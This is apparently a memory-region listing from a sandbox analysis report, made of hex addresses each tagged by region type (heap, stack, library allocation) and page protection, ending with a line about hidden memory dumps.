5FE3000
trusted library allocation
page read and write
3290000
heap
page read and write
6728000
heap
page read and write
2835000
trusted library allocation
page execute and read and write
E761000
trusted library allocation
page read and write
6B1000
heap
page read and write
862C000
stack
page read and write
824E000
stack
page read and write
4DF5000
trusted library allocation
page read and write
5E33000
heap
page read and write
6E00000
heap
page read and write
640000
heap
page read and write
4C1D000
trusted library allocation
page read and write
5E3E000
heap
page read and write
E20000
heap
page read and write
3043000
heap
page read and write
111F000
stack
page read and write
28C0000
heap
page read and write
6F10000
heap
page execute and read and write
5D74000
heap
page read and write
580000
heap
page read and write
7160000
trusted library allocation
page read and write
6680000
trusted library allocation
page read and write
66A1000
trusted library allocation
page read and write
83E0000
direct allocation
page read and write
3059000
heap
page read and write
9D11000
trusted library allocation
page read and write
6F72000
direct allocation
page read and write
51E0000
heap
page read and write
4FD0000
heap
page read and write
69E000
heap
page read and write
5F96000
heap
page read and write
672E000
heap
page read and write
45AD000
stack
page read and write
41E7000
heap
page read and write
5F86000
heap
page read and write
6B2E000
stack
page read and write
5B3E000
stack
page read and write
594C000
stack
page read and write
5E6F000
heap
page read and write
2F80000
heap
page read and write
3071000
heap
page read and write
7120000
trusted library allocation
page read and write
4CE0000
trusted library allocation
page read and write
5195000
heap
page read and write
5EEF000
heap
page read and write
5D04000
heap
page read and write
5F96000
heap
page read and write
2F88000
heap
page read and write
AD61000
trusted library allocation
page read and write
6744000
heap
page read and write
BB3000
heap
page read and write
5E71000
heap
page read and write
7C60000
heap
page read and write
6EB000
heap
page read and write
289A000
heap
page read and write
5F86000
heap
page read and write
7C70000
trusted library allocation
page execute and read and write
5E3C000
heap
page read and write
692000
heap
page read and write
520A000
trusted library allocation
page read and write
78BE000
stack
page read and write
6724000
heap
page read and write
700000
heap
page read and write
700000
heap
page read and write
673D000
heap
page read and write
699000
heap
page read and write
4E50000
heap
page read and write
6B3000
heap
page read and write
7F40000
trusted library section
page read and write
57C6000
trusted library allocation
page read and write
5F66000
heap
page read and write
6F6E000
stack
page read and write
688000
heap
page read and write
518E000
heap
page read and write
4FF7000
heap
page read and write
5080000
heap
page read and write
3077000
heap
page read and write
6641000
trusted library allocation
page read and write
66D8000
heap
page read and write
793E000
stack
page read and write
3076000
heap
page read and write
3058000
heap
page read and write
5D04000
heap
page read and write
4CE3000
trusted library allocation
page execute and read and write
13AD000
direct allocation
page execute and read and write
700D000
stack
page read and write
5E6A000
heap
page read and write
7CD0000
trusted library allocation
page read and write
4FE3000
trusted library allocation
page read and write
6A08000
heap
page read and write
3079000
heap
page read and write
5F9F000
heap
page read and write
4D10000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
6718000
heap
page read and write
5E3C000
heap
page read and write
51E0000
heap
page read and write
673D000
heap
page read and write
B761000
trusted library allocation
page read and write
501B000
heap
page read and write
628D000
heap
page read and write
5F44000
heap
page read and write
26B0000
heap
page read and write
7C0000
heap
page read and write
AA0000
heap
page read and write
EDEF000
trusted library allocation
page read and write
6648000
trusted library allocation
page read and write
501B000
heap
page read and write
5E3E000
heap
page read and write
AA6000
heap
page read and write
5FE1000
trusted library allocation
page read and write
5F9B000
heap
page read and write
5E71000
heap
page read and write
A0E000
stack
page read and write
760D000
stack
page read and write
5E2F000
heap
page read and write
51F9000
trusted library allocation
page read and write
68A000
heap
page read and write
671000
heap
page read and write
5016000
heap
page read and write
6B1000
heap
page read and write
7D50000
trusted library allocation
page read and write
5F9A000
heap
page read and write
4FCB000
heap
page read and write
6F70000
direct allocation
page read and write
A80000
heap
page read and write
69E000
heap
page read and write
5FEE000
trusted library allocation
page read and write
4D47000
heap
page read and write
6731000
heap
page read and write
6744000
heap
page read and write
5E3E000
heap
page read and write
609F000
trusted library allocation
page read and write
5F70000
heap
page read and write
5E48000
heap
page read and write
4B09000
trusted library allocation
page read and write
66D8000
heap
page read and write
68B000
heap
page read and write
51EF000
trusted library allocation
page read and write
733E000
stack
page read and write
87C0000
trusted library allocation
page execute and read and write
B3E000
stack
page read and write
70F0000
trusted library allocation
page read and write
6241000
heap
page read and write
307A000
heap
page read and write
5F86000
heap
page read and write
6ED0000
heap
page read and write
731000
heap
page read and write
6D7000
heap
page read and write
6A2000
heap
page read and write
628F000
heap
page read and write
4ECE000
stack
page read and write
671B000
heap
page read and write
6728000
heap
page read and write
C761000
trusted library allocation
page read and write
6B1000
heap
page read and write
6AC9000
trusted library allocation
page read and write
3399000
heap
page read and write
5F86000
heap
page read and write
672E000
heap
page read and write
7BE0000
heap
page execute and read and write
5007000
heap
page read and write
764B000
stack
page read and write
8D0F000
stack
page read and write
7DA0000
trusted library allocation
page read and write
4A41000
trusted library allocation
page read and write
4EA0000
trusted library allocation
page read and write
501B000
heap
page read and write
517D000
heap
page read and write
66A4000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
6AD000
heap
page read and write
57B5000
trusted library allocation
page read and write
6B4000
heap
page read and write
5F67000
heap
page read and write
51B9000
heap
page read and write
5F9B000
heap
page read and write
831E000
stack
page read and write
4680000
trusted library allocation
page read and write
6EB000
heap
page read and write
2FDF000
heap
page read and write
6E2000
heap
page read and write
62D000
stack
page read and write
5E29000
heap
page read and write
4DEC000
trusted library allocation
page read and write
6650000
trusted library allocation
page read and write
700000
heap
page read and write
6F76000
direct allocation
page read and write
6440000
trusted library allocation
page read and write
5ED000
stack
page read and write
1531000
direct allocation
page execute and read and write
51EE000
heap
page read and write
303F000
heap
page read and write
34DE000
stack
page read and write
50CD000
stack
page read and write
5A0000
heap
page read and write
6B1000
heap
page read and write
4FE4000
heap
page read and write
3339000
heap
page read and write
2FDF000
heap
page read and write
2FD0000
heap
page read and write
5FF7000
trusted library allocation
page read and write
6EB000
heap
page read and write
6744000
heap
page read and write
4F81000
trusted library allocation
page read and write
4E40000
trusted library allocation
page execute and read and write
6A8000
heap
page read and write
3058000
heap
page read and write
700000
heap
page read and write
7B70000
heap
page read and write
327F000
stack
page read and write
6731000
heap
page read and write
33A5000
heap
page read and write
6EB000
heap
page read and write
4D97000
heap
page read and write
5F50000
heap
page read and write
6B3000
heap
page read and write
6706000
heap
page read and write
672E000
heap
page read and write
5F99000
heap
page read and write
668A000
trusted library allocation
page read and write
4FBF000
stack
page read and write
6733000
heap
page read and write
6744000
heap
page read and write
68E000
heap
page read and write
673D000
heap
page read and write
4FD3000
heap
page read and write
5066000
heap
page read and write
50D7000
trusted library allocation
page read and write
307D000
heap
page read and write
5EE0000
heap
page read and write
506A000
heap
page read and write
6EB6000
heap
page read and write
416E000
stack
page read and write
5DE4000
heap
page read and write
78FE000
stack
page read and write
7B60000
trusted library allocation
page read and write
51D7000
heap
page read and write
6241000
heap
page read and write
7DFE000
heap
page read and write
3058000
heap
page read and write
4D12000
trusted library allocation
page read and write
700000
heap
page read and write
5F65000
heap
page read and write
5E77000
heap
page read and write
6FB0000
heap
page read and write
5062000
heap
page read and write
501B000
heap
page read and write
5E33000
heap
page read and write
7DB0000
trusted library allocation
page read and write
7440000
heap
page execute and read and write
26B7000
heap
page read and write
671000
heap
page read and write
16CE000
stack
page read and write
69E000
heap
page read and write
4D00000
trusted library allocation
page read and write
5F65000
heap
page read and write
303F000
heap
page read and write
2FA7000
heap
page read and write
7D70000
trusted library allocation
page read and write
7D80000
trusted library allocation
page read and write
5F96000
heap
page read and write
669C000
stack
page read and write
456C000
stack
page read and write
1440000
heap
page read and write
7F50000
trusted library allocation
page execute and read and write
7CF0000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
82DE000
stack
page read and write
323E000
stack
page read and write
5C3E000
stack
page read and write
A90000
heap
page read and write
5070000
heap
page read and write
74F0000
trusted library allocation
page read and write
700000
heap
page read and write
2818000
heap
page read and write
6706000
heap
page read and write
72FE000
stack
page read and write
5E7D000
heap
page read and write
5F66000
heap
page read and write
66DA000
heap
page read and write
51EE000
heap
page read and write
4E9E000
stack
page read and write
4CB6000
heap
page read and write
7130000
trusted library allocation
page read and write
6490000
trusted library allocation
page execute
7A93000
heap
page read and write
27F3000
trusted library allocation
page execute and read and write
665E000
stack
page read and write
51D6000
heap
page read and write
51B7000
heap
page read and write
6B2E000
stack
page read and write
628D000
heap
page read and write
4E3C000
stack
page read and write
32D0000
heap
page read and write
671D000
heap
page read and write
4621000
trusted library allocation
page read and write
BD61000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
307A000
heap
page read and write
6728000
heap
page read and write
5F98000
heap
page read and write
282A000
trusted library allocation
page execute and read and write
7952000
heap
page read and write
2FE0000
heap
page read and write
691000
heap
page read and write
5E34000
heap
page read and write
AFD000
stack
page read and write
69A000
heap
page read and write
7500000
trusted library allocation
page read and write
6AE000
heap
page read and write
41D0000
trusted library allocation
page read and write
6C9E000
stack
page read and write
737D000
stack
page read and write
6B6F000
stack
page read and write
671C000
stack
page read and write
5F67000
heap
page read and write
6B1000
heap
page read and write
70C0000
trusted library allocation
page execute and read and write
673D000
heap
page read and write
6FAE000
stack
page read and write
69B000
heap
page read and write
70AD000
stack
page read and write
EDD1000
trusted library allocation
page read and write
5F65000
heap
page read and write
8420000
direct allocation
page read and write
5168000
heap
page read and write
14D8000
heap
page read and write
5100000
heap
page read and write
7C90000
trusted library allocation
page read and write
68F000
heap
page read and write
6097000
trusted library allocation
page read and write
5C91000
heap
page read and write
2820000
trusted library allocation
page read and write
648000
heap
page read and write
141E000
direct allocation
page execute and read and write
6EB000
heap
page read and write
2E8E000
stack
page read and write
60AB000
trusted library allocation
page read and write
5E31000
heap
page read and write
7B90000
trusted library allocation
page execute and read and write
5F98000
heap
page read and write
5D66000
heap
page read and write
6A7000
heap
page read and write
51E6000
heap
page read and write
696000
heap
page read and write
683000
heap
page read and write
514E000
stack
page read and write
6F90000
direct allocation
page read and write
80D0000
trusted library allocation
page read and write
3056000
heap
page read and write
2FE8000
heap
page read and write
E27000
heap
page read and write
6A7000
heap
page read and write
70B000
stack
page read and write
2D5F000
stack
page read and write
6724000
heap
page read and write
306D000
heap
page read and write
2D80000
heap
page read and write
6EB000
heap
page read and write
4777000
trusted library allocation
page read and write
5E6F000
heap
page read and write
87D0000
trusted library allocation
page read and write
700000
heap
page read and write
681000
heap
page read and write
2860000
heap
page readonly
682D000
stack
page read and write
27FD000
trusted library allocation
page execute and read and write
7A64000
heap
page read and write
5FF1000
trusted library allocation
page read and write
6440000
heap
page read and write
672E000
heap
page read and write
3004000
heap
page read and write
6744000
heap
page read and write
896E000
stack
page read and write
7DC0000
trusted library allocation
page read and write
307A000
heap
page read and write
4CE4000
trusted library allocation
page read and write
5D05000
heap
page read and write
8980000
heap
page read and write
8890000
heap
page read and write
74D0000
trusted library allocation
page read and write
3335000
heap
page read and write
51F5000
heap
page read and write
5F97000
heap
page read and write
33BD000
heap
page read and write
101F000
stack
page read and write
267E000
stack
page read and write
5780000
heap
page read and write
5E6C000
heap
page read and write
170E000
stack
page read and write
51B6000
heap
page read and write
7150000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
5F70000
heap
page read and write
C70000
heap
page read and write
4C50000
heap
page read and write
69F0000
heap
page read and write
2800000
trusted library allocation
page read and write
692000
heap
page read and write
66F9000
heap
page read and write
892E000
stack
page read and write
2920000
heap
page read and write
6EB000
heap
page read and write
505C000
heap
page read and write
A97000
heap
page read and write
2FC0000
heap
page read and write
5E3C000
heap
page read and write
6B1000
heap
page read and write
5F70000
heap
page read and write
5EF0000
heap
page read and write
6683000
trusted library allocation
page read and write
2830000
trusted library allocation
page read and write
49E4000
trusted library allocation
page read and write
5F70000
heap
page read and write
5C0A000
trusted library allocation
page read and write
51E0000
heap
page read and write
673D000
heap
page read and write
6E5F000
heap
page read and write
2308000
stack
page read and write
2FA0000
heap
page read and write
57D5000
trusted library allocation
page read and write
5E3C000
heap
page read and write
EDBC000
trusted library allocation
page read and write
5E71000
heap
page read and write
D761000
trusted library allocation
page read and write
4E4F000
stack
page read and write
6706000
heap
page read and write
There are 923 hidden memdumps, click here to show them.